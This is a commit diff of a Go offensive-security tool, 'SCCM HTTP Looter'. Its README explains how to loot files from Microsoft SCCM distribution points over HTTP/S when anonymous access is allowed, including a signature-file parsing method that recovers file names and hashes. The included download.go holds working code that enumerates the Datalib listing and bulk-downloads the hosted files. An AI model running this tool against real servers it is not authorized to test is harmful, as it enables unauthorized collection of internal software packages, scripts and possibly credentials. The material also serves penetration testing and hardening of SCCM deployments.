🆕 Initial commit

.gititgnore

@@ -0,0 +1,70 @@
+# Binaries for programs and plugins
+*.exe
+*.exe~
+*.dll
+*.so
+*.dylib
+
+# Test binary, built with `go test -c`
+*.test
+
+# Output of the go coverage tool, specifically when used with LiteIDE
+*.out
+
+# Dependency directories (remove the comment below to include it)
+# vendor/
+
+# Go workspace file
+go.work
+
+### macOS ###
+# General
+.DS_Store
+.AppleDouble
+.LSOverride
+
+# Icon must end with two \r
+Icon
+
+
+# Thumbnails
+._*
+
+# Files that might appear in the root of a volume
+.DocumentRevisions-V100
+.fseventsd
+.Spotlight-V100
+.TemporaryItems
+.Trashes
+.VolumeIcon.icns
+.com.apple.timemachine.donotpresent
+
+# Directories potentially created on remote AFP share
+.AppleDB
+.AppleDesktop
+Network Trash Folder
+Temporary Items
+.apdisk
+
+### macOS Patch ###
+# iCloud generated files
+*.icloud
+
+### VisualStudioCode ###
+.vscode/*
+!.vscode/settings.json
+!.vscode/tasks.json
+!.vscode/launch.json
+!.vscode/extensions.json
+!.vscode/*.code-snippets
+
+# Local History for Visual Studio Code
+.history/
+
+# Built Visual Studio Code Extensions
+*.vsix
+
+### VisualStudioCode Patch ###
+# Ignore all local history of files
+.history
+.ionide

LICENSE

@@ -0,0 +1,7 @@
+Copyright (c) 2024 Bad Sector Labs
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

README.md

@@ -0,0 +1,49 @@
+# SCCM HTTP Looter
+
+## How it works
+
+SCCM distribution points (DPs) are the servers used by Microsoft SCCM to host all the files used in software installs, patches, script deployments, etc.
+By default, these servers allow access via SMB (TCP/445) and HTTP/S (TCP/80 and/or TCP/443) and require some type of Windows authentication (i.e. NTLM).
+
+The current SCCM DP looting tools rely on the ability to browse SMB shares to collect files. 
+
+- [CMloot](https://github.com/1njected/CMLoot)
+- [cmloot](https://github.com/shelltrail/cmloot)
+
+However, it is not uncommon for an organization to limit inbound SMB access to servers on internal networks, and standard practice to prevent inbound SMB access from the internet. HTTP/S access on the other hand is usually not restricted on internal networks, and often allowed from the internet. This presents an opportunity for an attacker if there is a way to get files from the SCCM DP via HTTP/S.
+
+### Why hasn't anyone done this before?
+
+The SMB tools work by enumerating the `DataLib` folder of the `SCCMContentLib$` share to find `<filename.ext>.INI` files which contain the hash of the file. They can then locate the actual file at `FileLib/<hash[0:4]>/<hash>`. This works because with access to the share, you can enumerate all files in the `DataLib` folder.
+
+Using HTTP/S, things are different. Browsing to `http://<SCCM DP>/SMS_DP_SMSPKG$/Datalib` shows a directory listing of numbered files and INIs. 
+
+For a variety of reasons (like [speed](https://old.reddit.com/r/SCCM/comments/5c4niq/sccm_2012_osd_download_faster_with_anonymous/)), these distribution points can be configured to allow anonymous access. 
+
+![](./imgs/iis-settings.png)
+
+However, navigating to the non-INI links simply shows the same page, which limits the number of files directly accessible to those in the "root" directory of the Datalib as the hashes extracted from the INI files for directories cannot be used to find the directories in the FileLib since it only stores actual files.
+
+![](./imgs/datalib.png)
+
+However, browsing to the directory name directly off the `http://<SCCM DP>/SMS_DP_SMSPKG$/` root will show files in that directory, which can be directly downloaded.
+
+![](./imgs/direct-url.png)
+
+This is how the `sccm-http-looter` works normally. It parses the Datalib directory listing for directories, then requests those and parses each for any files, before downloading any files with extensions that are in the allow list specified by the user.
+
+In the case where anonymous access is enabled but directory listing for directories off the `http://<SCCM DP>/SMS_DP_SMSPKG$/` root are disabled, there is a second technique to retrieve files that can be used by running the tool with `-use-signature-method`. In this mode the tool does the following:
+
+1. Downloads the Datalib listing from `http://<SCCM DP>/SMS_DP_SMSPKG$/Datalib`
+2. Parses the Datalib for all links
+3. Downloads any non .INI link filenames from `http://<SCCM DP>/SMS_DP_SMSSIG$/<filename>.tar`, where `<filename>` is the final element in any href from the Datalib page (i.e. `12300005.1`)
+4. Extracts the actual file name from the .tar signature file
+5. Downloads the INI file from `http://<SCCM DP>/SMS_DP_SMSPKG$/Datalib/<filename>/<extracted filename>.INI`
+6. Extracts the hash from the INI file
+7. Downloads the actual file from `http://<SCCM DP>/SMS_DP_SMSPKG$/<hash[0:4]>/<hash>` renaming it to the correct file name as specified in the signature file.
+
+The signature files are `.tar` files but are not actual tars. They contain filenames 512 bytes before the byte string `0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01` as shown below.
+
+![](./imgs/signature-hex.png)
+
+The tool searches for this byte string and extracts all file names from the signature files.

download.go

@@ -0,0 +1,208 @@
+package main
+
+import (
+	"crypto/sha256"
+	"encoding/hex"
+	"errors"
+	"fmt"
+	"io"
+	"log/slog"
+	"net/http"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+)
+
+func getDatalibListing(server, outputDir string) (string, error) {
+	// Ensure the base output directory exists
+	if err := os.MkdirAll(outputDir, os.ModePerm); err != nil {
+		slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err))
+		return "", err
+	}
+
+	url := fmt.Sprintf("%s/SMS_DP_SMSPKG$/Datalib", urlBase)
+	slog.Info(fmt.Sprintf("Getting Datalib listing from %s...\n", url))
+
+	response, err := customHTTPClient.Get(url)
+	if err != nil {
+		slog.Error(fmt.Sprintf("Error sending GET request: %v\n", err))
+		return "", err
+	}
+	defer response.Body.Close()
+
+	if response.StatusCode != http.StatusOK {
+		slog.Error(fmt.Sprintf("Received non-OK status code: %v\n", response.Status))
+		return "", fmt.Errorf("received non-OK status code: %v", response.Status)
+	}
+
+	body, err := io.ReadAll(response.Body)
+	if err != nil {
+		slog.Error(fmt.Sprintf("Error reading response body: %v\n", err))
+		slog.Error(fmt.Sprintf(`
+
+Try to download the Datalib manually with curl:
+curl -k -A 'sccm-http-looter' %s > datalib.html
+then run sccmlooter with '-datalib datalib.html'
+
+`, url))
+		return "", errors.New("error reading response body")
+	}
+
+	outputFileName := filepath.Join(outputDir, server+"_Datalib.txt")
+
+	err = os.WriteFile(outputFileName, body, 0644)
+	if err != nil {
+		slog.Error(fmt.Sprintf("Error writing to file: %v\n", err))
+		return "", err
+	}
+
+	slog.Debug(fmt.Sprintf("Data saved to %s\n", outputFileName))
+	return string(body), nil
+}
+
+func downloadINIAndFile(outPath, outPathFiles, filename, dirName string, wg *sync.WaitGroup, semaphore chan struct{}) {
+	defer func() {
+		// Read one struct from the semaphore channel to "let go" of one slot/thread
+		<-semaphore
+		wg.Done()
+	}()
+
+	outputPath := filepath.Join(outPath, filename+".INI")
+	url := fmt.Sprintf("%s/SMS_DP_SMSPKG$/Datalib/%s/%s.INI", urlBase, dirName, filename)
+
+	err := downloadFileFromURL(url, outputPath)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("Error downloading %s: %v\n", filename+".INI", err))
+		return
+	}
+
+	slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename+".INI", outputPath))
+	hash, err := getHashFromINI(outputPath)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("Error getting Hash from INI file %s: %v", outputPath, err))
+		return
+	}
+
+	// Get the actual file by its hash but save it to the correct name
+	if strings.Contains(filename, "/") {
+		filename = filepath.Base(filename)
+	}
+	outputPathFile := filepath.Join(outPathFiles, hash[0:4]+"_sig_"+filename)
+	fileURL := fmt.Sprintf("%s/SMS_DP_SMSPKG$/FileLib/%s/%s", urlBase, hash[0:4], hash)
+
+	err = downloadFileFromURL(fileURL, outputPathFile)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("Error downloading %s/%s: %v\n", hash[0:4], hash, err))
+		return
+	}
+
+	slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename, outputPathFile))
+
+}
+
+func downloadFileFromURL(url, outputPath string) error {
+	slog.Debug(fmt.Sprintf("Downloading %s", url))
+	// Send HTTP GET request to the URL
+	response, err := customHTTPClient.Get(url)
+	if err != nil {
+		return err
+	}
+	defer response.Body.Close()
+
+	// Check if the response status code is OK
+	if response.StatusCode != http.StatusOK {
+		return fmt.Errorf("HTTP request failed with status code: %d", response.StatusCode)
+	}
+	// Create or truncate the output file
+	file, err := os.Create(outputPath)
+	if err != nil {
+		return err
+	}
+	defer file.Close()
+
+	// Copy the response body to the output file
+	_, err = io.Copy(file, response.Body)
+	if err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func getURL(url string) (string, error) {
+	slog.Debug(fmt.Sprintf("Getting %s\n", url))
+
+	response, err := customHTTPClient.Get(url)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("Error sending GET request: %v\n", err))
+		return "", err
+	}
+	defer response.Body.Close()
+
+	if response.StatusCode != http.StatusOK {
+		slog.Debug(fmt.Sprintf("Received non-OK status code: %v\n", response.Status))
+		return "", err
+	}
+
+	body, err := io.ReadAll(response.Body)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("Error reading response body: %v\n", err))
+		return "", err
+	}
+	return string(body), nil
+}
+
+func downloadFileFromURLAsHashName(url, outputDir string, wg *sync.WaitGroup, semaphore chan struct{}) error {
+	defer func() {
+		// Read one struct from the semaphore channel to "let go" of one slot/thread
+		<-semaphore
+		wg.Done()
+	}()
+	var outputPath string
+	parts := strings.Split(url, "/")
+	if !(len(parts) > 0) {
+		slog.Debug(fmt.Sprintf("could not get file name from URL: %s", url))
+		return fmt.Errorf("could not get file name from URL: %s", url)
+	}
+
+	slog.Debug(fmt.Sprintf("Downloading %s", url))
+
+	// Send HTTP GET request to the URL
+	response, err := customHTTPClient.Get(url)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("%v", err))
+		return err
+	}
+	defer response.Body.Close()
+
+	// Check if the response status code is OK
+	if response.StatusCode != http.StatusOK {
+		slog.Debug(fmt.Sprintf("HTTP request failed with status code: %d", response.StatusCode))
+		return fmt.Errorf("HTTP request failed with status code: %d", response.StatusCode)
+	}
+	content, err := io.ReadAll(response.Body)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("%v", err))
+		return err
+	}
+
+	// Hash the file in memory
+	hasher := sha256.New()
+	hasher.Write(content)
+	hash := strings.ToUpper(hex.EncodeToString(hasher.Sum(nil)))
+
+	// Append the hash to the beginning of the file name
+	outputPath = filepath.Join(outputDir, hash[0:4]+"_url_"+parts[len(parts)-1])
+
+	slog.Debug(fmt.Sprintf("Output path: %s", outputPath))
+
+	// Write the response body to the output file
+	err = os.WriteFile(outputPath, content, 0644)
+	if err != nil {
+		slog.Debug(fmt.Sprintf("%v", err))
+		return err
+	}
+
+	return nil
+}